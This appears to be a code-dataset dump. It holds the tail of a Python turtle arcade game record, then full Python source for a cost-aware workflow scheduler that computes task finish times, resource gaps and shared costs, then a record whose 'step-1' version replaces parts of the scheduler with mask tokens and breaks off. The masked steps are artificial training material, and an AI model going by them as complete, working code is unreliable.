message.penup()\r\n message.goto(0, 0)\r\n font = (\"Calibri\", 24, \"bold\")\r\n message.write(\"GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!\".format(score), align=\"center\", font=font) \r\n\r\n # Functions\r\n def go_left():\r\n player.direction = \"left\"\r\n\r\n def go_right():\r\n player.direction = \"right\"\r\n\r\n def stop_player():\r\n player.direction = \"stop\"\r\n\r\n # Keyboard Binding\r\n wn.listen()\r\n wn.onkeypress(go_left, \"Left\")\r\n wn.onkeyrelease(stop_player, \"Left\")\r\n wn.onkeypress(go_right, \"Right\")\r\n wn.onkeyrelease(stop_player, \"Right\")\r\n\r\n\r\n \r\n while True:\r\n # Update screen\r\n wn.update()\r\n\r\n # Move the player\r\n if player.direction == \"left\":\r\n x = player.xcor()\r\n if x > -365:\r\n x -= 0.8\r\n player.setx(x)\r\n \r\n if player.direction == \"right\":\r\n x = player.xcor()\r\n if x < 365:\r\n x += 0.8\r\n player.setx(x)\r\n\r\n # Move the good guys\r\n for good_guy in good_guys:\r\n y = good_guy.ycor()\r\n y -= good_guy.speed\r\n good_guy.sety(y)\r\n\r\n # Check if off the screen\r\n if y < -300:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n good_guy.goto(x, y)\r\n\r\n # Check for a collision with player\r\n if good_guy.distance(player) < 40:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n good_guy.goto(x, y)\r\n score += 10\r\n pen.clear()\r\n pen.write(\"Score: {} Lives: {}\".format(score, lives), align=\"center\", font=font)\r\n winsound.PlaySound(\"video_game_retro_8bit_coin\", winsound.SND_FILENAME)\r\n \r\n # Move the bad guys\r\n for bad_guy in bad_guys:\r\n y = bad_guy.ycor()\r\n y -= bad_guy.speed\r\n bad_guy.sety(y)\r\n\r\n # Check if off the screen\r\n if y < -300:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n bad_guy.goto(x, y)\r\n\r\n # Check for a collision with player\r\n if bad_guy.distance(player) < 40:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n bad_guy.goto(x, y)\r\n score -= 10\r\n lives -= 1\r\n pen.clear()\r\n pen.write(\"Score: {} Lives: {}\".format(score, lives), align=\"center\", font=font)\r\n winsound.PlaySound(\"arcade_game_alarm_short\", winsound.SND_FILENAME)\r\n\r\n if lives <= 0:\r\n pen.clear()\r\n bad_guy.clear()\r\n good_guy.clear()\r\n show_message(score)\r\n winsound.PlaySound(\"game_over_sound\", winsound.SND_FILENAME)\r\n # wn.listen()\r\n # if wn.onkeypress(toggle_new_game, \"a\"):\r\n # if new_game == True:\r\n break\r\n # wn.onkeypress(sys.exit(), \"q\")\r\n\r\nwhile True:\r\n # Update screen\r\n wn.update()\r\n\r\n # Play music\r\n wn.bgpic(\"retro_city.gif\")\r\n winsound.PlaySound(\"retro_video_game_music-trimmed\", winsound.SND_LOOP)\r\n game_loop()\r\n turtle.Screen().clear()\r\n \r\n wn = turtle.Screen()\r\n wn.title(\"MaskUp\")\r\n wn.bgcolor(\"green\")\r\n wn.bgpic(\"retro_city_title_page.gif\")\r\n wn.setup(width=800, height=600)\r\n wn.tracer(0)\r\n\r\n #sys.exit()\r\n \r\n \r\n \r\n \r\n\r\n\r\nwn.mainloop()",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
from __future__ import print_function
import math
import db
from db import writer
from enum import Enum
from Definitions.Graph import Task
class Constraint(Enum):
deadline = 1
budget = 2
none = 3
def f_range(x, y, jump):
while x < y:
yield x
x += jump
class TaskSchedule:
def __init__(self, task, est=-1, runtime=-1, eft=-1, resource=-1):
self.task = task
self.EFT = eft
self.EST = est
self.runtime = runtime
self.resource = resource
class Resources(object):
len = -1
bandwidth = 0
def __init__(self, powers, bandwidth): # e.g. [1,1,2,2,4]
number_of_resources = len(powers)
self.power = powers
self.tasksOfResource = [] # ordered set of TaskSchedule objects in every resource
for i in range(number_of_resources):
self.tasksOfResource.append([])
self.len = number_of_resources
self.bandwidth = bandwidth
self.job_task_schedule = {} # job_task_schedule['Mine_10_1'][4].EFT == 12
def find_gap(self, resource, start_time, runtime):
'''
finds a gap in resource and returns the start time and the place index of the task among the current tasks of the resource
if resource is -1, it does nothing (returns the given start time, and -1 for place)
'''
if resource == -1:
return start_time, -1
number_of_tasks = len(self.tasksOfResource[resource])
if number_of_tasks == 0:
return start_time, 0
elif self.tasksOfResource[resource][0].EST >= start_time + runtime:
return start_time, 0
elif number_of_tasks == 1:
if self.tasksOfResource[resource][0].EFT < start_time:
return start_time, 1
else:
return self.tasksOfResource[resource][0].EFT, 1
else:
for i in range(1, number_of_tasks):
if self.tasksOfResource[resource][i].EST <= start_time:
continue
elif start_time < self.tasksOfResource[resource][i - 1].EFT:
gap = self.tasksOfResource[resource][i].EST - self.tasksOfResource[resource][i - 1].EFT
if gap < runtime:
continue
else:
return self.tasksOfResource[resource][i - 1].EFT, i
elif self.tasksOfResource[resource][i - 1].EFT <= start_time < self.tasksOfResource[resource][i].EST:
if self.tasksOfResource[resource][i].EST - start_time < runtime:
continue
else:
return start_time, i
else: # no gap is found, put it at the end (it can be done using append method)
return max(self.tasksOfResource[resource][-1].EFT, start_time), -1
def calculate_eft(self, task, resource_id, arrival_time=0):
g = task.graph
if resource_id == -1:
graphs_task_on_resource = []
task_runtime_on_resource = task.weight / max(self.power)
else:
task_runtime_on_resource = task.weight / self.power[resource_id]
graphs_task_on_resource = list(
map(lambda t: t.task.id if t.task.graph.name == g.name else -1, self.tasksOfResource[resource_id]))
max_est_of_task = arrival_time
for p in task.predecessor:
# check if p and task.id on the same resource_id
if p in graphs_task_on_resource:
communication_delay = 0
else:
communication_delay = task.predecessor[p] / self.bandwidth
if g.name not in self.job_task_schedule or p not in self.job_task_schedule[g.name]:
continue
p_eft = self.job_task_schedule[g.name][p].EFT
if p_eft + communication_delay > max_est_of_task:
max_est_of_task = p_eft + communication_delay
# EST Of Task is found and stored in max_est_of_task
# Find a gap to schedule it:
start_time, place_id = self.find_gap(resource_id, max_est_of_task, task_runtime_on_resource)
eft_task = start_time + task_runtime_on_resource
return start_time, eft_task, task_runtime_on_resource, place_id
def schedule(self, task_schedule, place_id=-1):
"""
Schedules a task in a place id. if place_id is -1 the schedule is appended to the last.
:type task_schedule: TaskSchedule
:type place_id: int
"""
resource = task_schedule.resource
if place_id == -1:
self.tasksOfResource[resource].append(task_schedule)
else:
self.tasksOfResource[resource].insert(place_id, task_schedule)
if task_schedule.task.graph.name in self.job_task_schedule:
pass
else:
self.job_task_schedule[task_schedule.task.graph.name] = {}
self.job_task_schedule[task_schedule.task.graph.name][task_schedule.task.id] = task_schedule
def show_schedule(self, job_id=-1, finishing=None, print_enabled=False):
result = []
for r in range(0, self.len):
names = []
est = []
eft = []
def add_entries(x):
if job_id != -1 and x.task.graph.name != job_id:
return
names.append(x.task.id if job_id != -1 else f'{x.task.graph.name}-{x.task.id}')
est.append(x.EST)
eft.append(x.EFT)
list(map(add_entries, self.tasksOfResource[r]))
result.append((names, est, eft))
def print_list(x):
if not print_enabled:
return
first = True
for e in x:
if first:
first = False
else:
print(',', end=' ')
print(e, end=' ')
print()
print_list(names)
print_list(est)
print_list(eft)
if finishing is not None and print_enabled:
print(finishing)
return result
def write_schedule(self, db_file, test_name='N/A', extra='single', policy='', job_count=1):
w = writer.Writer(db_file)
w.create_plan()
w.create_plan_head()
unique_jobs_id = w.write_plan_head(test_name, policy, job_count)
def add_entries(x):
job_name, job_type, task_id, jobs_id, start_time,\
finish_time, resource_id, resource_speed, \
job_component_id, extra_params = x.task.graph.name, x.task.graph.type, x.task.id, unique_jobs_id\
, x.EST,\
x.EFT, r, self.power[r], policy, extra
w.write_plan(job_name, job_type, task_id, jobs_id, start_time, finish_time, resource_id,
resource_speed, job_component_id, extra_params)
for r in range(0, self.len):
list(map(add_entries, self.tasksOfResource[r]))
w.commit()
w.close()
@property
def average_power(self):
return math.fsum(self.power) / self.len
@property
def makespan(self):
eft = 0
for i in range(0, self.len):
tasks_in_resource = self.tasksOfResource[i]
if len(tasks_in_resource) == 0:
continue
eft = max(eft, tasks_in_resource[-1].EFT)
return eft
def sum_gaps_resource(self, resource_id):
tasks_in_current_resource = self.tasksOfResource[resource_id]
num_tasks = len(tasks_in_current_resource)
if num_tasks <= 1:
return 0
sum_gaps = 0
for i in range(1, num_tasks):
if tasks_in_current_resource[i - 1].task.dummy_task or tasks_in_current_resource[i].task.dummy_task:
continue
finish_prev = tasks_in_current_resource[i - 1].EFT
start_current = tasks_in_current_resource[i].EST
gap_length = start_current - finish_prev
if gap_length < 0:
raise Exception('Schedule is not correct, check gaps!')
sum_gaps += gap_length
return sum_gaps
@property
def sum_internal_gaps(self):
sum_gaps = 0
for r in range(0, self.len):
sum_gaps += self.sum_gaps_resource(r)
return sum_gaps
def select_resource(self, task, arrival_time=0):
est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best = -1, -1, -1, -1, -1
for r in range(0, self.len):
max_est_of_task, eft_task, task_runtime_on_resource, place_id = self.calculate_eft(task, r, arrival_time=arrival_time)
if eft_best == -1 or eft_task < eft_best:
est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best = \
max_est_of_task, eft_task, task_runtime_on_resource, place_id, r
return est_best, runtime_on_resource_best, eft_best, resource_id_best, place_id_best
def get_fastest_empty_resource(self):
for r in range(self.len - 1, -1, -1):
if len(self.tasksOfResource[r]) == 0:
return r
else:
return -1
class CostAwareResources(Resources):
def __init__(self, powers, prices, timeslot_len, bandwidth):
super(CostAwareResources, self).__init__(powers, bandwidth)
self.timeslot = timeslot_len
self.price = prices
self.head_nodes = {}
self.sum_weight_scheduled = {}
def resource_cost(self, resource_id, start_time=-1, eft=-1, cost_only=True):
"""
computes a resource's cost. if cost_only==True, only returns cost, otherwise it returns also start and finish-times.
:param resource_id:
:param start_time:
:param eft:
:param cost_only:
:return:
"""
tasks_in_resource = [t for t in self.tasksOfResource[resource_id] if not t.task.dummy_task]
if not tasks_in_resource:
if eft == -1:
return 0 if cost_only else (0, 0, 0)
else:
return math.ceil((eft - start_time) / self.timeslot[resource_id]) * self.price[resource_id]
if start_time != -1:
task_start_time = min(tasks_in_resource[0].EST, start_time)
else:
task_start_time = tasks_in_resource[0].EST
task_finish_time = max(tasks_in_resource[-1].EFT, eft)
reservation = task_finish_time - task_start_time
cost = math.ceil(reservation / self.timeslot[resource_id]) * self.price[resource_id]
timeslot = self.timeslot[resource_id]
startof = [x.EST for x in tasks_in_resource]
endof = [x.EFT for x in tasks_in_resource]
if start_time != -1:
startof.append(start_time)
endof.append(eft)
startof.sort()
endof.sort()
timeslot_start = min(startof)
last_finish_time = max(endof)
current_task_id = 0
rent_periods = []
while timeslot_start < last_finish_time:
task_len = endof[current_task_id] - timeslot_start
time_slot_finish = endof[current_task_id] + (timeslot - (task_len % timeslot)) % timeslot
current_task_id += 1
if current_task_id >= len(startof):
rent_periods.append((timeslot_start, time_slot_finish))
break
if startof[current_task_id] <= time_slot_finish:
pass
else:
rent_periods.append((timeslot_start, time_slot_finish))
timeslot_start = startof[current_task_id]
sum = 0
for rp in rent_periods:
sum += (rp[1] - rp[0])
cost = sum / timeslot * self.price[resource_id]
if cost_only:
return cost
else:
return cost, min(startof), (max(endof))
def resource_start_time(self, resource_id):
tasks_in_resource = self.tasksOfResource[resource_id]
length = len(tasks_in_resource)
start_index = 0
while length > 0 and tasks_in_resource[start_index].task.dummy_task:
start_index += 1
length -= 1
if length == 0:
return -1
return tasks_in_resource[start_index].EST
@property
def plan_cost(self):
cost = 0
for i in range(0, self.len):
cost += self.resource_cost(i)
return cost
def calculate_shared_cost_within_timeslot(self, timeslot_start, est, ft, resource_id, task_id=None):
timeslot_end = timeslot_start + self.timeslot[resource_id]
if ft <= timeslot_start or est >= timeslot_end:
return 0
tasks = self.tasksOfResource[resource_id]
task_ids = self.task_id_in_timeslot(resource_id, timeslot_start)
sum_w = 0
for id in task_ids:
if task_id == id:
continue
start_time = tasks[id].EST
finish_time = tasks[id].EFT
if start_time < timeslot_start:
start_time = timeslot_start
if finish_time > timeslot_end:
finish_time = timeslot_end
sum_w += finish_time - start_time
if est < timeslot_start:
est = timeslot_start
if ft > timeslot_end:
ft = timeslot_end
if ft == est:
return 0
share = float(ft - est) / (sum_w + ft - est)
return share * self.price[resource_id]
def task_id_in_timeslot(self, resource_id, timeslot_start):
timeslot_end = timeslot_start + self.timeslot[resource_id]
task_ids = []
for id in range(len(self.tasksOfResource[resource_id])):
s = self.tasksOfResource[resource_id][id]
if timeslot_start <= s.EST <= timeslot_end or timeslot_start <= s.EFT <= timeslot_end \
or s.EST < timeslot_start and timeslot_end < s.EFT:
task_ids.append(id)
return task_ids
def calculate_task_shared_cost(self, est=-1, ft=-1, resource_id=-1, task_id=None):
if task_id is not None:
# this task has already been scheduled
est = self.tasksOfResource[resource_id][task_id].EST
ft = self.tasksOfResource[resource_id][task_id].EFT
timeslot_len = self.timeslot[resource_id]
resource_start_time = self.resource_start_time(resource_id)
if resource_start_time == -1:
resource_start_time = est
timeslot_start = float(timeslot_len) * math.floor((est - resource_start_time) /
timeslot_len) + resource_start_time
timeslot_end = float(timeslot_len) * math.ceil((ft - resource_start_time) /
timeslot_len) + resource_start_time
shared_cost = 0
for interval in f_range(timeslot_start, timeslot_end + timeslot_len / 2, timeslot_len):
share_in_interval = self.calculate_shared_cost_within_timeslot(interval, est, ft, resource_id, task_id)
shared_cost += share_in_interval
return shared_cost
def calculate_eft_and_cost(self, task, resource_id, arrival_time=0):
"""
calculates eft and cost of a certain task on a certain resource.
:param task:Definitions.Task()
:param resource_id:
:return:
"""
start_time, eft, runtime_on_resource, place_id = self.calculate_eft(task, resource_id, arrival_time=arrival_time)
if task.dummy_task:
return start_time, eft, runtime_on_resource, place_id, 0
else:
cost = self.calculate_share_cost_change(resource_id, start_time, eft, task.graph.name, True)
return start_time, eft, runtime_on_resource, place_id, cost
def sum_external_gaps_resource(self, r):
c, s, e = self.resource_cost(r, cost_only=False)
reservation = e - s
timeslot = self.timeslot[r]
gap = timeslot - reservation % timeslot
if gap == timeslot:
return 0
else:
return gap
@property
def sum_external_gaps(self):
sum_gaps = 0
for r in range(0, self.len):
sum_gaps += self.sum_external_gaps_resource(r)
return sum_gaps
@property
def sum_gaps(self):
return self.sum_internal_gaps + self.sum_external_gaps
@property
def occupied_resources(self):
counter = 0
for i in range(self.len):
if self.resource_cost(i) != 0:
counter += self.price[i]
return counter
@property
def gap_rate(self):
return self.sum_gaps / self.makespan / self.occupied_resources
def select_resource(self, task=Task(), test=None, arrival_time=0):
eft_best = -1
def something_found():
return eft_best != -1
if task.asap is not None:
if not task.asap: # budget workflow
if not test:
print('', end='')
# fastest affordable
est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \
-1, -1, -1, -1, -1, -1
for r in range(0, self.len):
start_time, eft, runtime_on_resource, place_id, cost = self.calculate_eft_and_cost(task, r, arrival_time=arrival_time)
if not something_found() or \
eft < eft_best and task.sub_deadline < eft_best or \
task.sub_budget < cost_best and eft <= task.sub_deadline and cost < cost_best or \
eft <= task.sub_deadline and cost <= task.sub_budget and \
(eft_best > task.sub_deadline or cost_best > task.sub_budget) or \
eft <= task.sub_deadline and cost <= task.sub_budget and eft < eft_best or \
eft <= task.sub_deadline and cost <= task.sub_budget and eft == eft_best and cost < cost_best:
est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \
start_time, eft, runtime_on_resource, place_id, r, cost
continue
if not test:
print('', end='')
return est_best, runtime_on_resource_best, eft_best, resource_id_best, place_id_best, cost_best
elif task.asap: # deadline workflow
# cheapest before sub-deadline
if not test:
print('', end='')
est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \
-1, -1, -1, -1, -1, -1
for r in range(0, self.len):
start_time, eft, runtime_on_resource, place_id, cost = self.calculate_eft_and_cost(task, r, arrival_time=arrival_time)
# if eft_best == -1 or eft_best > eft > task.sub_deadline or task.sub_deadline >= eft and (
# cost < cost_best or eft_best > task.sub_deadline):
if not something_found() or \
eft < eft_best and task.sub_deadline < eft_best or \
task.sub_budget < cost_best and eft <= task.sub_deadline and cost < cost_best or \
eft <= task.sub_deadline and cost <= task.sub_budget and \
(eft_best > task.sub_deadline or cost_best > task.sub_budget) or \
eft <= task.sub_deadline and cost <= task.sub_budget and cost < cost_best or \
eft <= task.sub_deadline and cost <= task.sub_budget and cost == cost_best and eft < eft_best:
est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \
start_time, eft, runtime_on_resource, place_id, r, cost
# if cost_best == -1 or cost_best > cost > task.sub_budget or task.sub_budget >= cost and (
# eft < eft_best or cost_best > task.sub_budget):
# est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \
# start_time, eft, runtime_on_resource, place_id, r, cost
continue
if not test:
print('', end='')
return est_best, runtime_on_resource_best, eft_best, resource_id_best, place_id_best, cost_best
else:
# minimize time (as in HEFT) TODO: it doesn't return cost (as the sixth return value)
return super(CostAwareResources, self).select_resource(task)
def price_of_each_graph(self):
graph_names = self.job_task_schedule.keys()
costs = {}
for name in graph_names:
costs[name] = 0
for r in range(self.len):
for id in range(len(self.tasksOfResource[r])):
name = self.tasksOfResource[r][id].task.graph.name
cost = self.calculate_task_shared_cost(resource_id=r, task_id=id)
costs[name] += cost
return costs
def get_cheapest_empty_resource(self):
for r in range(self.len):
if len(self.tasksOfResource[r]) == 0:
return r
else:
return -1
def schedule(self, task_schedule, place_id=-1, do_head_nodes=False):
super(CostAwareResources, self).schedule(task_schedule, place_id)
# head_node computations:
if not do_head_nodes:
return
if task_schedule.task.graph.name in self.head_nodes:
prev_heads = self.head_nodes[task_schedule.task.graph.name]
parents_of_current_task = task_schedule.task.predecessor.keys()
self.head_nodes[task_schedule.task.graph.name] = self.head_nodes[task_schedule.task.graph.name].difference(
parents_of_current_task)
self.head_nodes[task_schedule.task.graph.name].add(task_schedule.task.id)
else:
self.head_nodes[task_schedule.task.graph.name] = set()
self.head_nodes[task_schedule.task.graph.name].add(task_schedule.task.id)
self.sum_weight_scheduled[task_schedule.task.graph.name] = 0
self.sum_weight_scheduled[task_schedule.task.graph.name] += task_schedule.task.weight
def calculate_share_cost_change(self, resource_id, est=-1, eft=-1, job_id=-1, only_this_job=False):
sum_w = {}
for i in range(len(self.tasksOfResource[resource_id])):
sch = self.tasksOfResource[resource_id][i]
job = sch.task.graph.name
if job not in sum_w:
sum_w[job] = 0
sum_w[job] += sch.EFT - sch.EST
sum_w_all_old = sum(sum_w.values())
prev_cost_resource = self.resource_cost(resource_id)
prev_cost_job = {}
for j in sum_w.keys():
if sum_w_all_old == 0:
prev_cost_job[j] = 0
else:
prev_cost_job[j] = float(prev_cost_resource) * sum_w[j] / sum_w_all_old
if est == -1:
return prev_cost_job
new_cost_resource = self.resource_cost(resource_id, start_time=est, eft=eft)
if job_id not in sum_w:
sum_w[job_id] = 0
sum_w[job_id] += eft - est
sum_w_all_new = sum_w_all_old + eft - est
new_cost_job = {}
changes = {}
for j in sum_w.keys():
if sum_w_all_new == 0:
new_cost_job[j] = 0
else:
new_cost_job[j] = float(new_cost_resource) * sum_w[j] / sum_w_all_new
if j not in prev_cost_job:
changes[j] = new_cost_job[j]
else:
changes[j] = new_cost_job[j] - prev_cost_job[j]
if only_this_job:
return changes[job_id]
return changes
|
normal
|
{
"blob_id": "567076af26b8c93c68647103aeddf43aeb24db13",
"index": 2054,
"step-1": "<mask token>\n\n\nclass Resources(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def makespan(self):\n eft = 0\n for i in range(0, self.len):\n tasks_in_resource = self.tasksOfResource[i]\n if len(tasks_in_resource) == 0:\n continue\n eft = max(eft, tasks_in_resource[-1].EFT)\n return eft\n <mask token>\n\n @property\n def sum_internal_gaps(self):\n sum_gaps = 0\n for r in range(0, self.len):\n sum_gaps += self.sum_gaps_resource(r)\n return sum_gaps\n <mask token>\n <mask token>\n\n\nclass CostAwareResources(Resources):\n\n def __init__(self, powers, prices, timeslot_len, bandwidth):\n super(CostAwareResources, self).__init__(powers, bandwidth)\n self.timeslot = timeslot_len\n self.price = prices\n self.head_nodes = {}\n self.sum_weight_scheduled = {}\n\n def resource_cost(self, resource_id, start_time=-1, eft=-1, cost_only=True\n ):\n \"\"\"\n computes a resource's cost. if cost_only==True, only returns cost, otherwise it returns also start and finish-times.\n :param resource_id:\n :param start_time:\n :param eft:\n :param cost_only:\n :return:\n \"\"\"\n tasks_in_resource = [t for t in self.tasksOfResource[resource_id] if\n not t.task.dummy_task]\n if not tasks_in_resource:\n if eft == -1:\n return 0 if cost_only else (0, 0, 0)\n else:\n return math.ceil((eft - start_time) / self.timeslot[\n resource_id]) * self.price[resource_id]\n if start_time != -1:\n task_start_time = min(tasks_in_resource[0].EST, start_time)\n else:\n task_start_time = tasks_in_resource[0].EST\n task_finish_time = max(tasks_in_resource[-1].EFT, eft)\n reservation = task_finish_time - task_start_time\n cost = math.ceil(reservation / self.timeslot[resource_id]\n ) * self.price[resource_id]\n timeslot = self.timeslot[resource_id]\n startof = [x.EST for x in tasks_in_resource]\n endof = [x.EFT for x in tasks_in_resource]\n if start_time != -1:\n startof.append(start_time)\n endof.append(eft)\n startof.sort()\n endof.sort()\n timeslot_start = min(startof)\n last_finish_time = max(endof)\n current_task_id = 0\n rent_periods = []\n while timeslot_start < last_finish_time:\n task_len = endof[current_task_id] - timeslot_start\n time_slot_finish = endof[current_task_id] + (timeslot - \n task_len % timeslot) % timeslot\n current_task_id += 1\n if current_task_id >= len(startof):\n rent_periods.append((timeslot_start, time_slot_finish))\n break\n if startof[current_task_id] <= time_slot_finish:\n pass\n else:\n rent_periods.append((timeslot_start, time_slot_finish))\n timeslot_start = startof[current_task_id]\n sum = 0\n for rp in rent_periods:\n sum += rp[1] - rp[0]\n cost = sum / timeslot * self.price[resource_id]\n if cost_only:\n return cost\n else:\n return cost, min(startof), max(endof)\n\n def resource_start_time(self, resource_id):\n tasks_in_resource = self.tasksOfResource[resource_id]\n length = len(tasks_in_resource)\n start_index = 0\n while length > 0 and tasks_in_resource[start_index].task.dummy_task:\n start_index += 1\n length -= 1\n if length == 0:\n return -1\n return tasks_in_resource[start_index].EST\n\n @property\n def plan_cost(self):\n cost = 0\n for i in range(0, self.len):\n cost += self.resource_cost(i)\n return cost\n\n def calculate_shared_cost_within_timeslot(self, timeslot_start, est, ft,\n resource_id, task_id=None):\n timeslot_end = timeslot_start + self.timeslot[resource_id]\n if ft <= timeslot_start or est >= timeslot_end:\n return 0\n tasks = self.tasksOfResource[resource_id]\n task_ids = self.task_id_in_timeslot(resource_id, timeslot_start)\n sum_w = 0\n for id in task_ids:\n if task_id == id:\n continue\n start_time = tasks[id].EST\n finish_time = tasks[id].EFT\n if start_time < timeslot_start:\n start_time = timeslot_start\n if finish_time > timeslot_end:\n finish_time = timeslot_end\n sum_w += finish_time - start_time\n if est < timeslot_start:\n est = timeslot_start\n if ft > timeslot_end:\n ft = timeslot_end\n if ft == est:\n return 0\n share = float(ft - est) / (sum_w + ft - est)\n return share * self.price[resource_id]\n\n def task_id_in_timeslot(self, resource_id, timeslot_start):\n timeslot_end = timeslot_start + self.timeslot[resource_id]\n task_ids = []\n for id in range(len(self.tasksOfResource[resource_id])):\n s = self.tasksOfResource[resource_id][id]\n if (timeslot_start <= s.EST <= timeslot_end or timeslot_start <=\n s.EFT <= timeslot_end or s.EST < timeslot_start and \n timeslot_end < s.EFT):\n task_ids.append(id)\n return task_ids\n\n def calculate_task_shared_cost(self, est=-1, ft=-1, resource_id=-1,\n task_id=None):\n if task_id is not None:\n est = self.tasksOfResource[resource_id][task_id].EST\n ft = self.tasksOfResource[resource_id][task_id].EFT\n timeslot_len = self.timeslot[resource_id]\n resource_start_time = self.resource_start_time(resource_id)\n if resource_start_time == -1:\n resource_start_time = est\n timeslot_start = float(timeslot_len) * math.floor((est -\n resource_start_time) / timeslot_len) + resource_start_time\n timeslot_end = float(timeslot_len) * math.ceil((ft -\n resource_start_time) / timeslot_len) + resource_start_time\n shared_cost = 0\n for interval in f_range(timeslot_start, timeslot_end + timeslot_len /\n 2, timeslot_len):\n share_in_interval = self.calculate_shared_cost_within_timeslot(\n interval, est, ft, resource_id, task_id)\n shared_cost += share_in_interval\n return shared_cost\n\n def calculate_eft_and_cost(self, task, resource_id, arrival_time=0):\n \"\"\"\n calculates eft and cost of a certain task on a certain resource.\n :param task:Definitions.Task()\n :param resource_id:\n :return:\n \"\"\"\n start_time, eft, runtime_on_resource, place_id = self.calculate_eft(\n task, resource_id, arrival_time=arrival_time)\n if task.dummy_task:\n return start_time, eft, runtime_on_resource, place_id, 0\n else:\n cost = self.calculate_share_cost_change(resource_id, start_time,\n eft, task.graph.name, True)\n return start_time, eft, runtime_on_resource, place_id, cost\n\n def sum_external_gaps_resource(self, r):\n c, s, e = self.resource_cost(r, cost_only=False)\n reservation = e - s\n timeslot = self.timeslot[r]\n gap = timeslot - reservation % timeslot\n if gap == timeslot:\n return 0\n else:\n return gap\n\n @property\n def sum_external_gaps(self):\n sum_gaps = 0\n for r in range(0, self.len):\n sum_gaps += self.sum_external_gaps_resource(r)\n return sum_gaps\n\n @property\n def sum_gaps(self):\n return self.sum_internal_gaps + self.sum_external_gaps\n\n @property\n def occupied_resources(self):\n counter = 0\n for i in range(self.len):\n if self.resource_cost(i) != 0:\n counter += self.price[i]\n return counter\n\n @property\n def gap_rate(self):\n return self.sum_gaps / self.makespan / self.occupied_resources\n\n def select_resource(self, task=Task(), test=None, arrival_time=0):\n eft_best = -1\n\n def something_found():\n return eft_best != -1\n if task.asap is not None:\n if not task.asap:\n if not test:\n print('', end='')\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best\n ) = -1, -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (start_time, eft, runtime_on_resource, place_id, cost) = (\n self.calculate_eft_and_cost(task, r, arrival_time=\n arrival_time))\n if (not something_found() or eft < eft_best and task.\n sub_deadline < eft_best or task.sub_budget <\n cost_best and eft <= task.sub_deadline and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and (eft_best > task.sub_deadline or\n cost_best > task.sub_budget) or eft <= task.\n sub_deadline and cost <= task.sub_budget and eft <\n eft_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and eft == eft_best and cost <\n cost_best):\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best) = (\n start_time, eft, runtime_on_resource, place_id,\n r, cost)\n continue\n if not test:\n print('', end='')\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best, cost_best)\n elif task.asap:\n if not test:\n print('', end='')\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best\n ) = -1, -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (start_time, eft, runtime_on_resource, place_id, cost) = (\n self.calculate_eft_and_cost(task, r, arrival_time=\n arrival_time))\n if (not something_found() or eft < eft_best and task.\n sub_deadline < eft_best or task.sub_budget <\n cost_best and eft <= task.sub_deadline and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and (eft_best > task.sub_deadline or\n cost_best > task.sub_budget) or eft <= task.\n sub_deadline and cost <= task.sub_budget and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and cost == cost_best and eft <\n eft_best):\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best) = (\n start_time, eft, runtime_on_resource, place_id,\n r, cost)\n continue\n if not test:\n print('', end='')\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best, cost_best)\n else:\n return super(CostAwareResources, self).select_resource(task)\n\n def price_of_each_graph(self):\n graph_names = self.job_task_schedule.keys()\n costs = {}\n for name in graph_names:\n costs[name] = 0\n for r in range(self.len):\n for id in range(len(self.tasksOfResource[r])):\n name = self.tasksOfResource[r][id].task.graph.name\n cost = self.calculate_task_shared_cost(resource_id=r,\n task_id=id)\n costs[name] += cost\n return costs\n\n def get_cheapest_empty_resource(self):\n for r in range(self.len):\n if len(self.tasksOfResource[r]) == 0:\n return r\n else:\n return -1\n\n def schedule(self, task_schedule, place_id=-1, do_head_nodes=False):\n super(CostAwareResources, self).schedule(task_schedule, place_id)\n if not do_head_nodes:\n return\n if task_schedule.task.graph.name in self.head_nodes:\n prev_heads = self.head_nodes[task_schedule.task.graph.name]\n parents_of_current_task = task_schedule.task.predecessor.keys()\n self.head_nodes[task_schedule.task.graph.name] = self.head_nodes[\n task_schedule.task.graph.name].difference(\n parents_of_current_task)\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule\n .task.id)\n else:\n self.head_nodes[task_schedule.task.graph.name] = set()\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule\n .task.id)\n self.sum_weight_scheduled[task_schedule.task.graph.name] = 0\n self.sum_weight_scheduled[task_schedule.task.graph.name\n ] += task_schedule.task.weight\n\n def calculate_share_cost_change(self, resource_id, est=-1, eft=-1,\n job_id=-1, only_this_job=False):\n sum_w = {}\n for i in range(len(self.tasksOfResource[resource_id])):\n sch = self.tasksOfResource[resource_id][i]\n job = sch.task.graph.name\n if job not in sum_w:\n sum_w[job] = 0\n sum_w[job] += sch.EFT - sch.EST\n sum_w_all_old = sum(sum_w.values())\n prev_cost_resource = self.resource_cost(resource_id)\n prev_cost_job = {}\n for j in sum_w.keys():\n if sum_w_all_old == 0:\n 